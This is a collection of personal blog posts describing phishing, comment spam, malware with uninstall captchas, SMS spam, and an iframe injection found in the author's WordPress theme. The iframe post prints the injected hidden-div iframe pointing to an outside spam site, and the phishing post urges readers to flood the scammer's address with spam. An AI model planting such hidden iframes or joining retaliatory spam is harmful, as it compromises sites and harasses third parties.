Stupid Phishers

Last night at 10:20PM CST, the droid’s green status light started blinking. It was an email on one’s school email. Titled “An Important Message From The University of Minnesota”, the message claimed that one needed to provide information in order to retain one’s email account after a mail server upgrade. 25 minutes later the message was sent again. The email, in it’s textual entirety is as follows:

Dear Webmail User,

Due to high volume of unused account on our server and the upgrade of The University of Minnesota webmail Service, we hereby request every webmail account holders to submit the below information for our server upgrade purposes.

Name:

Email:

Password:

Department:

failure to submit the above information may lead to automatic closure of your webmail account as we are upgrading our server to serve you best.

We appreciate your continued co-operation.

Well, let’s see here. Let’s start with information the sender already had (if they were legitimate). Anyone that has a University of Minnesota email can find the full name of any UMN email address, so asking for one’s name was not necessary. Second, asking for one’s email address, why? Seriously, emails don’t just randomly appear in inboxes (well truth be told, gmail has delivered mail not addressed to one, in one’s inbox before).

Now onto the information that sender doesn’t need to know (to do their job, assuming they are legitimate). One’s password, which one did they want, the email one? Oh wait, with the way the University does its online authentication, the password would be one’s x500 password. The fact that the University uses a global authentication system means that the password is irrelevant for email servers (or any individual server for that matter). Never mind the fact that you should never, under any circumstances send a password via email (especially to unknown recipients). Finally, the request for one’s department. Well that one makes even less sense. One’s department is completely irrelevant to one’s University email account.

At one point, one was tempted to reply with fake information (possibly containing highly inflammatory language). Looking at the headers, one found that the email was sent through Yahoo’s mail servers (originating from att-entries@att.net), the reply to address was securies.edu@gmail.com (feel free to sign this address up for copious amounts of spam, send fake replies to undermine their Phishing operations, or do both).

If all of that wasn’t enough to place the message into the spam/phisher bin there was the top image, linked from a non UMN website. The phisher also used a footer that official UMN email has not used for at least a semester now.

-John Havlik

[end of transmission, stay tuned]

New Spamming Tactics

Something caught one’s eye today, there was a new comment the seemed far too familiar. The chosen name for the commenter may have been a complete give away. However, one has seen people with legitimate comments use their website name as their alias. It did not take much effort to find where the comment’s body came from, they were one’s own words from a comment placed earlier on post–over a month ago. Differentiating between simple, and misguided plagiarism and spam required looking at, or in this case only the URI of, the site linked to as the commenter’s “website” (some World of Warcraft gold selling site).

This seems to be the “holy grail” of comment spam, producing “relevant” comments while linking to what ever site they are promoting. Spam Karma 2 even thought it was valid–SK2 is losing it’s effectiveness. While in this case the site was not relevant, the body of the comment was relevant to the discussion. It took plagiarism to accomplish it, but for people already breaking laws what’s another broken law (plagiarism is a form or copyright violation/theft).

To protect against this new breed of spam a few things could be done to resolve the issue. The first is, in the case of SK2, the comment author website URI needs to be checked against a distributed blacklist as all other URIs in the comment body are (SK2 probably already does this, but the site was not on the list yet). Secondly, comments should be checked for an “originality” percentage. Basically, this would compare it against other comments for the post, and then under the potential matches, find how close it is to them. This would prevent direct sentence, paragraph and comment plagiarism/lifting. Ultimately, making code behave as a human is the goal. If all else fails, improving the ability to find the person behind the spam so that justice may be brought to him (or her) would suffice.

-John Havlik

[end of transmission, stay tuned]

Klikvp.com Exploite

Even though things are updated regularly on this blog, an iframe based exploit was discovered today. Unlike the previous iframe attack, which came through a SQL injection, this one involved modified theme files. Unlike the previous googlerank.info iframe attack, this one’s payload does not appear to be malicious, rather it is spammy.

There are a few things that point to some level of sophistication in the injection. First off, the code was injected into the end of the header.php file, only on the active theme. Typically, a script kiddy will not bother figuring out which theme is in use and instead will carpet bomb the place with malicious code. Secondly, the modification date on the file matches the last time the header was uploaded from the testbed. No, the testbed’s code was not compromised. This points to a possible Windows exploit (yes the Weblogs.us server still runs on Windows, unfortunately.) as any changes should have caused the modification date and time to update. Finally, rather than having the iframe hidden via CSS, there is a container div which is hidden instead, making it more difficult to have a general CSS rule to expose the iframe.

< div style="display:none" >< iframe src="http://klikvp.com/css/go.php?sid=1" frameborder="0" height="1" width="1" > < iframe > < div >

That is the offending code. Spaces were added to prevent execution. Klikvp is the same as Klikvip which is a known spammer. The tricky sucker is using a wrapping div now. The good news is that WordPress Exploit Scanner will find this, so keeping it around and periodically scanning is a good thing to do. It doesn’t offer dashboard notifications like Iframe-b-gone does but it scans files and other things that Iframe-b-gone does not.

-John Havlik

[end of transmission, stay tuned]

Uninstall Captchas?

Software follows a life cycle on a computer, which begins with installation and ends in uninstallation. Uninstallation may happen for various reasons, new version of the software, free disk space for other things. Removing software should be less painful than installation. Software that is difficult to remove is evil. Viruses and spyware/malware typically make the removal process as painful as possible. Oddly enough Symantec does the same thing with their consumer grade “Security Software”.
Are you human?
While working on a computer for a neighbor, I came across a few tool bars and other general junk installed on the computer. Even though tool bars usually are not spyware, there is no reason to have the Google, Yahoo, and ask tool bars installed plus a few others. The uninstallers were one or two click installers, pretty standard stuff. Then came the odd software. No one knew what it was, but it was sitting on the installed applications list. Before uninstalling, the user was prompted to fill out a captcha to prove that they were not a computer. After filling it out the uninstall process proceeded as usual. A second software package had the same sort of thing, but it was a tad more sophisticated. It had animated noise bars. Either way, why are these software writers afraid of automated removal of their software? It is pretty obvious, they wrote malware.

What did it do? Well, the obvious thing was auto spawning and eating up 50% of the CPU resources (the system has a Pentium D 820 processor). It disguised itself as Internet Explorer (Why anyone still uses IE is beyond comprehension). Additionally it would cause periodic pop ups and a odd message alert prompt stating “Windows Explorer” when entering Control Panel.

-John Havlik

[end of transmission, stay tuned]

SMS Spammer

Didn’t see that one coming. Now that proxy dialers exist on the internet, it’s no surprise that some internet to SMS services exist now. The sad thing is they are being abused at the expense of the message recipient.

Back on the 24th of January, a spammer by the name of Giovanni@instantmash.com sent a text message to my cellphone advertising getwellwontyoust.com. Usually e-mail spam’s only cost is time and bandwidth, in which for the end user bandwidth is usually unlimited. For SMS, the cost is 50 cents per a message received, plus an additional 50 cents for connection (with Verizon as SMS is not part of my plan as I don’t text people). Luckily, I believe Verizon will be removing the charges as it was a Spam, otherwise I’ll use the WHOIS information for both the spammed address and the sender and send them a bill.

A quick Google search reveals that istantmash.com has been suspended and that getwellwontyoust.com is a sex spam site. Looks like the latter is registered to a one Natalie Wood, of Sacramento California. Natale Wood is most likely as pseudo name as the fax number is invalid (area code 555) and I have doubts on the legitimacy of the provide phone number of (916) 742-3301. Under federal law and a precedent set in the class action lawsuit Shen v. Distributive Networks LLC. No. 06 C 4403 the offender may owe me and any one else he or she SMS spammed up to 150USD in damages.

-John Havlik

[end of transmission, stay tuned]